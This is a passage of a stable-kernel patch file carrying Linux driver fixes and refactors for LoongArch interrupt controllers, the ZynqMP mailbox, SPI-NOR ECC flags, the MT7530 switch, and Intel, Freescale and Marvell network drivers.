+ 	int i, ret, parent_irq;
+ 	unsigned long node_map;
+ 	struct eiointc_priv *priv;
++	int node;
+ 
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+@@ -416,13 +422,19 @@ int __init eiointc_acpi_init(struct irq_domain *parent,
+ 	parent_irq = irq_create_mapping(parent, acpi_eiointc->cascade);
+ 	irq_set_chained_handler_and_data(parent_irq, eiointc_irq_dispatch, priv);
+ 
+-	register_syscore_ops(&eiointc_syscore_ops);
+-	cpuhp_setup_state_nocalls(CPUHP_AP_IRQ_LOONGARCH_STARTING,
++	if (nr_pics == 1) {
++		register_syscore_ops(&eiointc_syscore_ops);
++		cpuhp_setup_state_nocalls(CPUHP_AP_IRQ_LOONGARCH_STARTING,
+ 				  "irqchip/loongarch/intc:starting",
+ 				  eiointc_router_init, NULL);
++	}
+ 
+-	acpi_set_vec_parent(acpi_eiointc->node, priv->eiointc_domain, pch_group);
+-	acpi_set_vec_parent(acpi_eiointc->node, priv->eiointc_domain, msi_group);
++	if (cpu_has_flatmode)
++		node = cpu_to_node(acpi_eiointc->node * CORES_PER_EIO_NODE);
++	else
++		node = acpi_eiointc->node;
++	acpi_set_vec_parent(node, priv->eiointc_domain, pch_group);
++	acpi_set_vec_parent(node, priv->eiointc_domain, msi_group);
+ 	ret = acpi_cascade_irqdomain_init();
+ 
+ 	return ret;
+diff --git a/drivers/irqchip/irq-loongson-pch-pic.c b/drivers/irqchip/irq-loongson-pch-pic.c
+index 437f1af693d01..e5fe4d50be056 100644
+--- a/drivers/irqchip/irq-loongson-pch-pic.c
++++ b/drivers/irqchip/irq-loongson-pch-pic.c
+@@ -311,7 +311,8 @@ static int pch_pic_init(phys_addr_t addr, unsigned long size, int vec_base,
+ 	pch_pic_handle[nr_pics] = domain_handle;
+ 	pch_pic_priv[nr_pics++] = priv;
+ 
+-	register_syscore_ops(&pch_pic_syscore_ops);
++	if (nr_pics == 1)
++		register_syscore_ops(&pch_pic_syscore_ops);
+ 
+ 	return 0;
+ 
+@@ -403,6 +404,9 @@ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 	int ret, vec_base;
+ 	struct fwnode_handle *domain_handle;
+ 
++	if (find_pch_pic(acpi_pchpic->gsi_base) >= 0)
++		return 0;
++
+ 	vec_base = acpi_pchpic->gsi_base - GSI_MIN_PCH_IRQ;
+ 
+ 	domain_handle = irq_domain_alloc_fwnode(&acpi_pchpic->address);
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index e02a4a18e8c29..d097f45b0e5f5 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -110,7 +110,7 @@ struct zynqmp_ipi_pdata {
+ 	unsigned int method;
+ 	u32 local_id;
+ 	int num_mboxes;
+-	struct zynqmp_ipi_mbox *ipi_mboxes;
++	struct zynqmp_ipi_mbox ipi_mboxes[];
+ };
+ 
+ static struct device_driver zynqmp_ipi_mbox_driver = {
+@@ -634,8 +634,13 @@ static int zynqmp_ipi_probe(struct platform_device *pdev)
+ 	struct zynqmp_ipi_mbox *mbox;
+ 	int num_mboxes, ret = -EINVAL;
+ 
+-	num_mboxes = of_get_child_count(np);
+-	pdata = devm_kzalloc(dev, sizeof(*pdata) + (num_mboxes * sizeof(*mbox)),
++	num_mboxes = of_get_available_child_count(np);
++	if (num_mboxes == 0) {
++		dev_err(dev, "mailbox nodes not available\n");
++		return -EINVAL;
++	}
++
++	pdata = devm_kzalloc(dev, struct_size(pdata, ipi_mboxes, num_mboxes),
+ 			     GFP_KERNEL);
+ 	if (!pdata)
+ 		return -ENOMEM;
+@@ -649,8 +654,6 @@ static int zynqmp_ipi_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	pdata->num_mboxes = num_mboxes;
+-	pdata->ipi_mboxes = (struct zynqmp_ipi_mbox *)
+-			    ((char *)pdata + sizeof(*pdata));
+ 
+ 	mbox = pdata->ipi_mboxes;
+ 	for_each_available_child_of_node(np, nc) {
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index bf50a35db711e..d75db50767938 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2471,6 +2471,9 @@ static void spi_nor_init_flags(struct spi_nor *nor)
+ 
+ 	if (flags & NO_CHIP_ERASE)
+ 		nor->flags |= SNOR_F_NO_OP_CHIP_ERASE;
++
++	if (flags & SPI_NOR_RWW)
++		nor->flags |= SNOR_F_RWW;
+ }
+ 
+ /**
+@@ -2980,6 +2983,9 @@ static void spi_nor_set_mtd_info(struct spi_nor *nor)
+ 		mtd->name = dev_name(dev);
+ 	mtd->type = MTD_NORFLASH;
+ 	mtd->flags = MTD_CAP_NORFLASH;
++	/* Unset BIT_WRITEABLE to enable JFFS2 write buffer for ECC'd NOR */
++	if (nor->flags & SNOR_F_ECC)
++		mtd->flags &= ~MTD_BIT_WRITEABLE;
+ 	if (nor->info->flags & SPI_NOR_NO_ERASE)
+ 		mtd->flags |= MTD_NO_ERASE;
+ 	else
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index f4246c52a1def..75ec2e5604247 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -130,6 +130,8 @@ enum spi_nor_option_flags {
+ 	SNOR_F_IO_MODE_EN_VOLATILE = BIT(11),
+ 	SNOR_F_SOFT_RESET	= BIT(12),
+ 	SNOR_F_SWP_IS_VOLATILE	= BIT(13),
++	SNOR_F_RWW		= BIT(14),
++	SNOR_F_ECC		= BIT(15),
+ };
+ 
+ struct spi_nor_read_command {
+@@ -459,6 +461,7 @@ struct spi_nor_fixups {
+  *   NO_CHIP_ERASE:           chip does not support chip erase.
+  *   SPI_NOR_NO_FR:           can't do fastread.
+  *   SPI_NOR_QUAD_PP:         flash supports Quad Input Page Program.
++ *   SPI_NOR_RWW:             flash supports reads while write.
+  *
+  * @no_sfdp_flags:  flags that indicate support that can be discovered via SFDP.
+  *                  Used when SFDP tables are not defined in the flash. These
+@@ -509,6 +512,7 @@ struct flash_info {
+ #define NO_CHIP_ERASE			BIT(7)
+ #define SPI_NOR_NO_FR			BIT(8)
+ #define SPI_NOR_QUAD_PP			BIT(9)
++#define SPI_NOR_RWW			BIT(10)
+ 
+ 	u8 no_sfdp_flags;
+ #define SPI_NOR_SKIP_SFDP		BIT(0)
+diff --git a/drivers/mtd/spi-nor/debugfs.c b/drivers/mtd/spi-nor/debugfs.c
+index 558ffecf8ae6d..285bdcbaa1134 100644
+--- a/drivers/mtd/spi-nor/debugfs.c
++++ b/drivers/mtd/spi-nor/debugfs.c
+@@ -25,6 +25,8 @@ static const char *const snor_f_names[] = {
+ 	SNOR_F_NAME(IO_MODE_EN_VOLATILE),
+ 	SNOR_F_NAME(SOFT_RESET),
+ 	SNOR_F_NAME(SWP_IS_VOLATILE),
++	SNOR_F_NAME(RWW),
++	SNOR_F_NAME(ECC),
+ };
+ #undef SNOR_F_NAME
+ 
+diff --git a/drivers/mtd/spi-nor/spansion.c b/drivers/mtd/spi-nor/spansion.c
+index 07fe0f6fdfe3e..aef085b476deb 100644
+--- a/drivers/mtd/spi-nor/spansion.c
++++ b/drivers/mtd/spi-nor/spansion.c
+@@ -218,6 +218,17 @@ static int cypress_nor_set_page_size(struct spi_nor *nor)
+ 	return 0;
+ }
+ 
++static void cypress_nor_ecc_init(struct spi_nor *nor)
++{
++	/*
++	 * Programming is supported only in 16-byte ECC data unit granularity.
++	 * Byte-programming, bit-walking, or multiple program operations to the
++	 * same ECC data unit without an erase are not allowed.
++	 */
++	nor->params->writesize = 16;
++	nor->flags |= SNOR_F_ECC;
++}
++
+ static int
+ s25hx_t_post_bfpt_fixup(struct spi_nor *nor,
+ 			const struct sfdp_parameter_header *bfpt_header,
+@@ -255,13 +266,10 @@ static void s25hx_t_post_sfdp_fixup(struct spi_nor *nor)
+ 
+ static void s25hx_t_late_init(struct spi_nor *nor)
+ {
+-	struct spi_nor_flash_parameter *params = nor->params;
+-
+ 	/* Fast Read 4B requires mode cycles */
+-	params->reads[SNOR_CMD_READ_FAST].num_mode_clocks = 8;
++	nor->params->reads[SNOR_CMD_READ_FAST].num_mode_clocks = 8;
+ 
+-	/* The writesize should be ECC data unit size */
+-	params->writesize = 16;
++	cypress_nor_ecc_init(nor);
+ }
+ 
+ static struct spi_nor_fixups s25hx_t_fixups = {
+@@ -324,7 +332,7 @@ static int s28hx_t_post_bfpt_fixup(struct spi_nor *nor,
+ static void s28hx_t_late_init(struct spi_nor *nor)
+ {
+ 	nor->params->octal_dtr_enable = cypress_nor_octal_dtr_enable;
+-	nor->params->writesize = 16;
++	cypress_nor_ecc_init(nor);
+ }
+ 
+ static const struct spi_nor_fixups s28hx_t_fixups = {
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 326f992536a7e..69b6a9265e4e4 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -446,9 +446,9 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		else
+ 			ssc_delta = 0x87;
+ 		if (priv->id == ID_MT7621) {
+-			/* PLL frequency: 150MHz: 1.2GBit */
++			/* PLL frequency: 125MHz: 1.0GBit */
+ 			if (xtal == HWTRAP_XTAL_40MHZ)
+-				ncpo1 = 0x0780;
++				ncpo1 = 0x0640;
+ 			if (xtal == HWTRAP_XTAL_25MHZ)
+ 				ncpo1 = 0x0a00;
+ 		} else { /* PLL frequency: 250MHz: 2.0Gbit */
+@@ -1015,9 +1015,9 @@ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ 	mt7530_write(priv, MT7530_PVC_P(port),
+ 		     PORT_SPEC_TAG);
+ 
+-	/* Disable flooding by default */
+-	mt7530_rmw(priv, MT7530_MFC, BC_FFP_MASK | UNM_FFP_MASK | UNU_FFP_MASK,
+-		   BC_FFP(BIT(port)) | UNM_FFP(BIT(port)) | UNU_FFP(BIT(port)));
++	/* Enable flooding on the CPU port */
++	mt7530_set(priv, MT7530_MFC, BC_FFP(BIT(port)) | UNM_FFP(BIT(port)) |
++		   UNU_FFP(BIT(port)));
+ 
+ 	/* Set CPU port number */
+ 	if (priv->id == ID_MT7621)
+@@ -2312,12 +2312,69 @@ mt7530_setup(struct dsa_switch *ds)
+ 	return 0;
+ }
+ 
++static int
++mt7531_setup_common(struct dsa_switch *ds)
++{
++	struct mt7530_priv *priv = ds->priv;
++	struct dsa_port *cpu_dp;
++	int ret, i;
++
++	/* BPDU to CPU port */
++	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
++		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
++			   BIT(cpu_dp->index));
++		break;
++	}
++	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_BPDU_CPU_ONLY);
++
++	/* Enable and reset MIB counters */
++	mt7530_mib_reset(ds);
++
++	/* Disable flooding on all ports */
++	mt7530_clear(priv, MT7530_MFC, BC_FFP_MASK | UNM_FFP_MASK |
++		     UNU_FFP_MASK);
++
++	for (i = 0; i < MT7530_NUM_PORTS; i++) {
++		/* Disable forwarding by default on all ports */
++		mt7530_rmw(priv, MT7530_PCR_P(i), PCR_MATRIX_MASK,
++			   PCR_MATRIX_CLR);
++
++		/* Disable learning by default on all ports */
++		mt7530_set(priv, MT7530_PSC_P(i), SA_DIS);
++
++		mt7530_set(priv, MT7531_DBG_CNT(i), MT7531_DIS_CLR);
++
++		if (dsa_is_cpu_port(ds, i)) {
++			ret = mt753x_cpu_port_enable(ds, i);
++			if (ret)
++				return ret;
++		} else {
++			mt7530_port_disable(ds, i);
++
++			/* Set default PVID to 0 on all user ports */
++			mt7530_rmw(priv, MT7530_PPBV1_P(i), G0_PORT_VID_MASK,
++				   G0_PORT_VID_DEF);
++		}
++
++		/* Enable consistent egress tag */
++		mt7530_rmw(priv, MT7530_PVC_P(i), PVC_EG_TAG_MASK,
++			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
++	}
++
++	/* Flush the FDB table */
++	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
++	if (ret < 0)
++		return ret;
++
++	return 0;
++}
++
+ static int
+ mt7531_setup(struct dsa_switch *ds)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+ 	struct mt7530_dummy_poll p;
+-	struct dsa_port *cpu_dp;
+ 	u32 val, id;
+ 	int ret, i;
+ 
+@@ -2395,44 +2452,7 @@ mt7531_setup(struct dsa_switch *ds)
+ 	mt7531_ind_c45_phy_write(priv, MT753X_CTRL_PHY_ADDR, MDIO_MMD_VEND2,
+ 				 CORE_PLL_GROUP4, val);
+ 
+-	/* BPDU to CPU port */
+-	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
+-		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
+-			   BIT(cpu_dp->index));
+-		break;
+-	}
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
+-		   MT753X_BPDU_CPU_ONLY);
+-
+-	/* Enable and reset MIB counters */
+-	mt7530_mib_reset(ds);
+-
+-	for (i = 0; i < MT7530_NUM_PORTS; i++) {
+-		/* Disable forwarding by default on all ports */
+-		mt7530_rmw(priv, MT7530_PCR_P(i), PCR_MATRIX_MASK,
+-			   PCR_MATRIX_CLR);
+-
+-		/* Disable learning by default on all ports */
+-		mt7530_set(priv, MT7530_PSC_P(i), SA_DIS);
+-
+-		mt7530_set(priv, MT7531_DBG_CNT(i), MT7531_DIS_CLR);
+-
+-		if (dsa_is_cpu_port(ds, i)) {
+-			ret = mt753x_cpu_port_enable(ds, i);
+-			if (ret)
+-				return ret;
+-		} else {
+-			mt7530_port_disable(ds, i);
+-
+-			/* Set default PVID to 0 on all user ports */
+-			mt7530_rmw(priv, MT7530_PPBV1_P(i), G0_PORT_VID_MASK,
+-				   G0_PORT_VID_DEF);
+-		}
+-
+-		/* Enable consistent egress tag */
+-		mt7530_rmw(priv, MT7530_PVC_P(i), PVC_EG_TAG_MASK,
+-			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
+-	}
++	mt7531_setup_common(ds);
+ 
+ 	/* Setup VLAN ID 0 for VLAN-unaware bridges */
+ 	ret = mt7530_setup_vlan0(priv);
+@@ -2442,11 +2462,6 @@ mt7531_setup(struct dsa_switch *ds)
+ 	ds->assisted_learning_on_cpu_port = true;
+ 	ds->mtu_enforcement_ingress = true;
+ 
+-	/* Flush the FDB table */
+-	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
+-	if (ret < 0)
+-		return ret;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index e57d86484a3a4..9959262ebad2c 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5113,6 +5113,7 @@ static const struct mv88e6xxx_ops mv88e6321_ops = {
+ 	.set_cpu_port = mv88e6095_g1_set_cpu_port,
+ 	.set_egress_port = mv88e6095_g1_set_egress_port,
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
++	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.reset = mv88e6352_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc_qos.c b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+index fcebb54224c09..a8539a8554a13 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc_qos.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+@@ -1255,7 +1255,7 @@ static int enetc_psfp_parse_clsflower(struct enetc_ndev_priv *priv,
+ 		int index;
+ 
+ 		index = enetc_get_free_index(priv);
+-		if (sfi->handle < 0) {
++		if (index < 0) {
+ 			NL_SET_ERR_MSG_MOD(extack, "No Stream Filter resource!");
+ 			err = -ENOSPC;
+ 			goto free_fmi;
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 2341597408d12..5fd3b41319827 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -3737,7 +3737,8 @@ static int fec_enet_txq_xmit_frame(struct fec_enet_private *fep,
+ 	entries_free = fec_enet_get_free_txdesc_num(txq);
+ 	if (entries_free < MAX_SKB_FRAGS + 1) {
+ 		netdev_err(fep->netdev, "NOT enough BD for SG!\n");
+-		return NETDEV_TX_OK;
++		xdp_return_frame(frame);
++		return NETDEV_TX_BUSY;
+ 	}
+ 
+ 	/* Fill in a Tx ring entry */
+@@ -3795,6 +3796,7 @@ static int fec_enet_xdp_xmit(struct net_device *dev,
+ 	struct fec_enet_private *fep = netdev_priv(dev);
+ 	struct fec_enet_priv_tx_q *txq;
+ 	int cpu = smp_processor_id();
++	unsigned int sent_frames = 0;
+ 	struct netdev_queue *nq;
+ 	unsigned int queue;
+ 	int i;
+@@ -3805,8 +3807,11 @@ static int fec_enet_xdp_xmit(struct net_device *dev,
+ 
+ 	__netif_tx_lock(nq, cpu);
+ 
+-	for (i = 0; i < num_frames; i++)
+-		fec_enet_txq_xmit_frame(fep, txq, frames[i]);
++	for (i = 0; i < num_frames; i++) {
++		if (fec_enet_txq_xmit_frame(fep, txq, frames[i]) != 0)
++			break;
++		sent_frames++;
++	}
+ 
+ 	/* Make sure the update to bdp and tx_skbuff are performed. */
+ 	wmb();
+@@ -3816,7 +3821,7 @@ static int fec_enet_xdp_xmit(struct net_device *dev,
+ 
+ 	__netif_tx_unlock(nq);
+ 
+-	return num_frames;
++	return sent_frames;
+ }
+ 
+ static const struct net_device_ops fec_netdev_ops = {
+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index ce72d512eddf9..a9db9bdd72629 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+@@ -693,17 +693,18 @@ ice_eswitch_add_tc_fltr(struct ice_vsi *vsi, struct ice_tc_flower_fltr *fltr)
+ 	 * results into order of switch rule evaluation.
+ 	 */
+ 	rule_info.priority = 7;
++	rule_info.flags_info.act_valid = true;
+ 
+ 	if (fltr->direction == ICE_ESWITCH_FLTR_INGRESS) {
+ 		rule_info.sw_act.flag |= ICE_FLTR_RX;
+ 		rule_info.sw_act.src = hw->pf_id;
+ 		rule_info.rx = true;
++		rule_info.flags_info.act = ICE_SINGLE_ACT_LB_ENABLE;
+ 	} else {
+ 		rule_info.sw_act.flag |= ICE_FLTR_TX;
+ 		rule_info.sw_act.src = vsi->idx;
+ 		rule_info.rx = false;
+ 		rule_info.flags_info.act = ICE_SINGLE_ACT_LAN_ENABLE;
+-		rule_info.flags_info.act_valid = true;
+ 	}
+ 
+ 	/* specify the cookie as filter_rule_id */
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
+index f8156fe4b1dc4..0ee943db3dc92 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
+@@ -1035,9 +1035,6 @@ static void ixgbe_free_q_vector(struct ixgbe_adapter *adapter, int v_idx)
+ 	adapter->q_vector[v_idx] = NULL;
+ 	__netif_napi_del(&q_vector->napi);
+ 
+-	if (static_key_enabled(&ixgbe_xdp_locking_key))
+-		static_branch_dec(&ixgbe_xdp_locking_key);
+-
+ 	/*
+ 	 * after a call to __netif_napi_del() napi may still be used and
+ 	 * ixgbe_get_stats64() might access the rings on this vector,
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 4507fba8747a7..03e583cf48153 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -6495,6 +6495,10 @@ static int ixgbe_sw_init(struct ixgbe_adapter *adapter,
+ 	set_bit(0, adapter->fwd_bitmask);
+ 	set_bit(__IXGBE_DOWN, &adapter->state);
+ 
++	/* enable locking for XDP_TX if we have more CPUs than queues */
++	if (nr_cpu_ids > IXGBE_MAX_XDP_QS)
++		static_branch_enable(&ixgbe_xdp_locking_key);
++
+ 	return 0;
+ }
+ 
+@@ -10288,8 +10292,6 @@ static int ixgbe_xdp_setup(struct net_device *dev, struct bpf_prog *prog)
+ 	 */
+ 	if (nr_cpu_ids > IXGBE_MAX_XDP_QS * 2)
+ 		return -ENOMEM;
+-	else if (nr_cpu_ids > IXGBE_MAX_XDP_QS)
+-		static_branch_inc(&ixgbe_xdp_locking_key);
+ 
+ 	old_prog = xchg(&adapter->xdp_prog, prog);
+ 	need_reset = (!!prog != !!old_prog);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index 724df6398bbe2..bd77152bb8d7c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -1231,6 +1231,14 @@ static inline void link_status_user_format(u64 lstat,
+ 	linfo->an = FIELD_GET(RESP_LINKSTAT_AN, lstat);
+ 	linfo->fec = FIELD_GET(RESP_LINKSTAT_FEC, lstat);
+ 	linfo->lmac_type_id = FIELD_GET(RESP_LINKSTAT_LMAC_TYPE, lstat);
++
++	if (linfo->lmac_type_id >= LMAC_MODE_MAX) {
++		dev_err(&cgx->pdev->dev, "Unknown lmac_type_id %d reported by firmware on cgx port%d:%d",
++			linfo->lmac_type_id, cgx->cgx_id, lmac_id);
++		strncpy(linfo->lmac_type, "Unknown", LMACTYPE_STR_LEN - 1);
++		return;
++	}
++
+ 	lmac_string = cgx_lmactype_string[linfo->lmac_type_id];
+ 	strncpy(linfo->lmac_type, lmac_string, LMACTYPE_STR_LEN - 1);
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+index 2898931d5260a..9690ac01f02c8 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+@@ -157,7 +157,7 @@ EXPORT_SYMBOL(otx2_mbox_init);
+  */
+ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void **hwbase,
+ 			   struct pci_dev *pdev, void *reg_base,
+-			   int direction, int ndevs)
++			   int direction, int ndevs, unsigned long *pf_bmap)
+ {
+ 	struct otx2_mbox_dev *mdev;
+ 	int devid, err;
+@@ -169,6 +169,9 @@ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void **hwbase,
+ 	mbox->hwbase = hwbase[0];
+ 
+ 	for (devid = 0; devid < ndevs; devid++) {
++		if (!test_bit(devid, pf_bmap))
++			continue;
++
+ 		mdev = &mbox->dev[devid];
+ 		mdev->mbase = hwbase[devid];
+ 		mdev->hwbase = hwbase[devid];
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index d2584ebb7a70c..d9ee56ff73b46 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -96,9 +96,10 @@ void otx2_mbox_destroy(struct otx2_mbox *mbox);
+ int otx2_mbox_init(struct otx2_mbox *mbox, void __force *hwbase,
+ 		   struct pci_dev *pdev, void __force *reg_base,
+ 		   int direction, int ndevs);
++
+ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void __force **hwbase,
+ 			   struct pci_dev *pdev, void __force *reg_base,
+-			   int direction, int ndevs);
++			   int direction, int ndevs, unsigned long *bmap);
+ void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_wait_for_rsp(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_busy_poll_for_rsp(struct otx2_mbox *mbox, int devid);
+@@ -242,9 +243,9 @@ M(NPC_MCAM_READ_BASE_RULE, 0x6011, npc_read_base_steer_rule,            \
+ M(NPC_MCAM_GET_STATS, 0x6012, npc_mcam_entry_stats,                     \
+ 				   npc_mcam_get_stats_req,              \
+ 				   npc_mcam_get_stats_rsp)              \
+-M(NPC_GET_SECRET_KEY, 0x6013, npc_get_secret_key,                     \
+-				   npc_get_secret_key_req,              \
+-				   npc_get_secret_key_rsp)              \
++M(NPC_GET_FIELD_HASH_INFO, 0x6013, npc_get_field_hash_info,                     \
++				   npc_get_field_hash_info_req,              \
++				   npc_get_field_hash_info_rsp)              \
+ M(NPC_GET_FIELD_STATUS, 0x6014, npc_get_field_status,                     \
+ 				   npc_get_field_status_req,              \
+ 				   npc_get_field_status_rsp)              \
+@@ -1517,14 +1518,20 @@ struct npc_mcam_get_stats_rsp {
+ 	u8 stat_ena; /* enabled */
+ };
+ 
+-struct npc_get_secret_key_req {
++struct npc_get_field_hash_info_req {
+ 	struct mbox_msghdr hdr;
+ 	u8 intf;
+ };
+ 
+-struct npc_get_secret_key_rsp {
++struct npc_get_field_hash_info_rsp {
+ 	struct mbox_msghdr hdr;
+ 	u64 secret_key[3];
++#define NPC_MAX_HASH 2
++#define NPC_MAX_HASH_MASK 2
++	/* NPC_AF_INTF(0..1)_HASH(0..1)_MASK(0..1) */
++	u64 hash_mask[NPC_MAX_INTF][NPC_MAX_HASH][NPC_MAX_HASH_MASK];
++	/* NPC_AF_INTF(0..1)_HASH(0..1)_RESULT_CTRL */
++	u64 hash_ctrl[NPC_MAX_INTF][NPC_MAX_HASH];
+ };
+ 
+ enum ptp_op {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+index f68a6a0e3aa41..c43f19dfbd744 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+@@ -473,6 +473,8 @@ void mcs_flowid_entry_write(struct mcs *mcs, u64 *data, u64 *mask, int flow_id,
+ 		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_DATAX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, data[reg_id]);
++		}
++		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, mask[reg_id]);
+ 		}
+@@ -480,6 +482,8 @@ void mcs_flowid_entry_write(struct mcs *mcs, u64 *data, u64 *mask, int flow_id,
+ 		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_TX_SLAVE_FLOWID_TCAM_DATAX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, data[reg_id]);
++		}
++		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_TX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, mask[reg_id]);
+ 		}
+@@ -494,6 +498,9 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 
+ 	/* Flow entry */
+ 	flow_id = mcs->hw->tcam_entries - MCS_RSRC_RSVD_CNT;
++	__set_bit(flow_id, mcs->rx.flow_ids.bmap);
++	__set_bit(flow_id, mcs->tx.flow_ids.bmap);
++
+ 	for (reg_id = 0; reg_id < 4; reg_id++) {
+ 		reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 		mcs_reg_write(mcs, reg, GENMASK_ULL(63, 0));
+@@ -504,6 +511,8 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 	}
+ 	/* secy */
+ 	secy_id = mcs->hw->secy_entries - MCS_RSRC_RSVD_CNT;
++	__set_bit(secy_id, mcs->rx.secy.bmap);
++	__set_bit(secy_id, mcs->tx.secy.bmap);
+ 
+ 	/* Set validate frames to NULL and enable control port */
+ 	plcy = 0x7ull;
+@@ -528,6 +537,7 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 	/* Enable Flowid entry */
+ 	mcs_ena_dis_flowid_entry(mcs, flow_id, MCS_RX, true);
+ 	mcs_ena_dis_flowid_entry(mcs, flow_id, MCS_TX, true);
++
+ 	return 0;
+ }
+ 
+@@ -926,60 +936,42 @@ static void mcs_tx_misc_intr_handler(struct mcs *mcs, u64 intr)
+ 	mcs_add_intr_wq_entry(mcs, &event);
+ }
+ 
+-static void mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir)
++void cn10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr,
++				 enum mcs_direction dir)
+ {
+-	struct mcs_intr_event event = { 0 };
+-	int i;
++	u64 val, reg;
++	int lmac;
+ 
+-	if (!(intr & MCS_BBE_INT_MASK))
++	if (!(intr & 0x6ULL))
+ 		return;
+ 
+-	event.mcs_id = mcs->mcs_id;
+-	event.pcifunc = mcs->pf_map[0];
